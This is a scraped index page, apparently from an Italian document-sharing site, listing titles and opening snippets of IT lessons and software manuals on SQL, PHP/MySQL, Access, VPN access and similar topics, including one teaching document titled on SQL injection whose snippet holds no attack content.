Laboratorio Progettazione Web PHP e MySQL - Lezione 9 Andrea Marchetti IIT-CNR andrea.marchetti@iit.cnr.ita 2012/2013 Architettura di una applicazione Web Browser Web HTTP Server Web API Dati Presentation
DettagliSOMMARIO... 3 INTRODUZIONE...
Sommario SOMMARIO... 3 INTRODUZIONE... 4 INTRODUZIONE ALLE FUNZIONALITÀ DEL PROGRAMMA INTRAWEB... 4 STRUTTURA DEL MANUALE... 4 INSTALLAZIONE INRAWEB VER. 11.0.0.0... 5 1 GESTIONE INTRAWEB VER 11.0.0.0...
DettagliCORSO ACCESS PARTE II. Esistono diversi tipi di aiuto forniti con Access, generalmente accessibili tramite la barra dei menu (?)
Ambiente Access La Guida di Access Esistono diversi tipi di aiuto forniti con Access, generalmente accessibili tramite la barra dei menu (?) Guida in linea Guida rapida Assistente di Office indicazioni
DettagliSicurezza Informatica: Tecniche di SQL INJECTION
Sicurezza Informatica: Tecniche di SQL INJECTION Pietro Bongli Aprile 2004 N.B. L'informazione contenuta in queste pagine è divulgata per scopi puramente didattici e non per ni illegali. Structured Query
DettagliSQL prima parte D O C E N T E P R O F. A L B E R T O B E L U S S I. Anno accademico 2011/12
SQL prima parte D O C E N T E P R O F. A L B E R T O B E L U S S I Anno accademico 2011/12 DEFINIZIONE Il concetto di vista 2 È una relazione derivata. Si specifica l espressione che genera il suo contenuto.
DettagliUna metodologia di progettazione di applicazioni web centrate sui dati
Una metodologia di progettazione di applicazioni web centrate sui dati A L B E R T O B E L U S S I A N N O A C C A D E M I C O 2 0 1 1 / 2 0 1 2 Progettazione logica di un sito web centrato sui dati Si
DettagliJoin in SQL (primo modo) Informatica. Tabella Dipartimento. Interrogazione 4a. Interrogazione 4b. Interrogazione 4a
Join in SQL (primo modo) Informatica Lezione 7 Laurea magistrale in Psicologia Laurea magistrale in Psicologia dello sviluppo e dell'educazione Anno accademico: 09- Per formulare interrogazioni che coinvolgono
DettagliTeamPortal. Servizi integrati con ambienti Gestionali
TeamPortal Servizi integrati con ambienti Gestionali 12/2013 Accesso da remoto Accesso da remoto Esempio 1 Sul Firewall devono essere aperte le porte 80 : http (o quella assegnata in fase di installazione/configurazione
DettagliManuale Utente SIRECO
Corte Dei Conti Manuale Utente SIRECO Guida all accesso a SIRECO Indice dei contenuti 1. Obiettivo del documento... 3 1.1 Acronimi, abbreviazioni, e concetti di base... 3 2. Registrazione di un Responsabile...
DettagliManuale d uso Software di parcellazione per commercialisti Ver. 1.0.3 [05/01/2015]
Manuale d uso Software di parcellazione per commercialisti Ver. 1.0.3 [05/01/2015] Realizzato e distribuito da LeggeraSoft Sommario Premessa... 2 Fase di Login... 2 Menù principale... 2 Anagrafica clienti...
DettagliMODULO 5 ACCESS Basi di dati. Lezione 4
MODULO 5 ACCESS Basi di dati Lezione 4 ARGOMENTI Lezione 4 Filtrare i dati Esempio 1 Query Cos è Creare Query in visualizza struttura Criteri di ricerca Esempio 2 Esempio 3 Esempio 4 Creare Query in creazione
DettagliObiettivo dell esercitazione
Database e Web - Esercitazioni ASP - Andrea Proli proliand@csr.unibo.it Laboratorio di Basi di Dati A.A. 2005/2006 Obiettivo dell esercitazione L obiettivo finale dell esercitazione è quello di creare
DettagliEsercitazione query in SQL L esercitazione viene effettuata sul database viaggi e vacanze che prevede il seguente modello E/R:
Esercitazione query in SQL L esercitazione viene effettuata sul database viaggi e vacanze che prevede il seguente modello E/R: Si consiglia di creare il data base, inserire i dati nelle tabelle, provare
DettagliIntroduzione ai database relazionali
Introduzione ai database relazionali Tabelle Un database (DB) è costituito da un insieme di file che memorizzano dati opportunamente organizzati Nei database relazionale tale organizzazione è costituita
DettagliModulo 4 Il pannello amministrativo dell'hosting e il database per Wordpress
Copyright Andrea Giavara wppratico.com Modulo 4 Il pannello amministrativo dell'hosting e il database per Wordpress 1. Il pannello amministrativo 2. I dati importanti 3. Creare il database - Cpanel - Plesk
DettagliESEMPI DI QUERY SQL. Esempi di Query SQL Michele Batocchi AS 2012/2013 Pagina 1 di 7
ESEMPI DI QUERY SQL Dati di esempio... 2 Query su una sola tabella... 2 Esempio 1 (Ordinamento)... 2 Esempio 2 (Scelta di alcune colonne)... 3 Esempio 3 (Condizioni sui dati)... 3 Esempio 4 (Condizioni
DettagliACCESSO AL PORTALE VPN
Indice generale ACCESSO AL PORTALE VPN...3 ACCESSO CON MICROSOFT INTERNET EXPLORER...3 ACCESSO CON MOZILLA FIREFOX...4 ACCESSO CON GOOGLE CHROME...5 IL PORTALE PER LA GESTIONE DELLE CONNESSIONI...6 CONFIGURAZIONE
DettagliSistema Informativo di Teleraccolta EMITTENTI
Sistema Informativo di EMITTENTI aventi l Italia come Stato membro di origine i cui valori mobiliari sono ammessi alla negoziazione in un altro Stato membro dell Unione Europea Art. 116 bis, comma 1, del
DettagliGuida Migrazione Posta Elettronica @uilpa.it. Operazioni da effettuare entro il 15 gennaio 2012
Guida Migrazione Posta Elettronica @uilpa.it Operazioni da effettuare entro il 15 gennaio 2012 CONTENUTI PREMESSA ACCESSO AL PROPRIO ACCOUNT SCHERMATA INIZIALE (Desktop) SALVATAGGIO CONTATTI (2) GESTIONE
Dettagli1 Riconoscimento del soggetto richiedente da parte del sistema
Guida alla compilazione on-line della domanda per il bando Servizi per l accesso all istruzione (Trasporto scolastico, assistenza disabili e servizio pre-scuola e post-scuola) INDICE 1 Riconoscimento del
DettagliManuale Operativo per il Processo di Qualifica dei Fornitori
Manuale Operativo per il Processo di Qualifica dei Fornitori Stato del documento Versione Data Sintesi dei cambiamenti Approvato da 6 03/10/2014 Aggiunto paragrafo 3.12 Stato Documenti 5 29/09/2014 Indicazione
DettagliMANUALE PROSPETTI ONLINE VIA S.A.RE.
Sistema Informativo Lavoro Regione Emilia - Romagna MANUALE PROSPETTI ONLINE VIA S.A.RE. Bologna, 24/01/2008 Versione 1.0 Nome file: Manuale Prospetti doc Redattore: G.Salomone, S.Terlizzi Stato: Bozza
DettagliGUIDA DOCENTE ALL USO DELLA PIATTAFORMA EXCHANGE E-LEARNING - Lotus Quickr
GUIDA DOCENTE ALL USO DELLA PIATTAFORMA EXCHANGE E-LEARNING - Lotus Quickr 1. 0BACCESSO Accesso - Interfaccia e navigazione Cartella personale studente Download allegati Risposta ad un messaggio ricevuto
DettagliSOSEBI PAPERMAP2 MODULO WEB MANUALE DELL UTENTE
SOSEBI PAPERMAP2 MODULO WEB MANUALE DELL UTENTE S O. S E. B I. P R O D O T T I E S E R V I Z I P E R I B E N I C U L T U R A L I So.Se.Bi. s.r.l. - via dell Artigianato, 9-09122 Cagliari Tel. 070 / 2110311
DettagliIntegrazione InfiniteCRM - MailUp
Integrazione InfiniteCRM - MailUp La funzionalità della gestione delle campagne marketing di icrm è stata arricchita con la spedizione di email attraverso l integrazione con la piattaforma MailUp. Creando
DettagliCorso Analista Programmatore Web PHP Corso Online Analista Programmatore Web PHP
Corso Analista Programmatore Web PHP Corso Online Analista Programmatore Web PHP Accademia Futuro info@accademiafuturo.it Programma Generale del Corso Analista Programmatore Web PHP Tematiche Trattate
DettagliSistemi Mobili e Wireless Android - Dati persistenti: SQLite
Sistemi Mobili e Wireless Android - Dati persistenti: SQLite Stefano Burigat Dipartimento di Matematica e Informatica Università di Udine www.dimi.uniud.it/burigat stefano.burigat@uniud.it Android offre
DettagliMANUALE DI INTEGRAZIONE API SMSSmart (v 2.2)
MANUALE DI INTEGRAZIONE API SMSSmart (v 2.2) Questo documento contiene le informazioni necessarie per l interfacciamento con il gateway SMS di SMSSmart. Il suo utilizzo è riservato ai clienti che abbiano
DettagliProcedura rinnovo certificati
Procedura rinnovo certificati Utilizzo della funzione in Dike Util Data Rev. Dicembre 2012 2.0 Pagina 2 di 11 Data: Dicembre 2012 Sommario 1. Executive Summary... 3 2. Benvenuto... 3 3. Verifiche... 4
DettagliGuida all attivazione ipase
Guida all attivazione ipase Passo 1 Dopo la fase di installazione del programma, ecco la maschera che compare all avvio di ipase: Occorre ora procedere alla registrazione del prodotto, facendo click su
Dettagli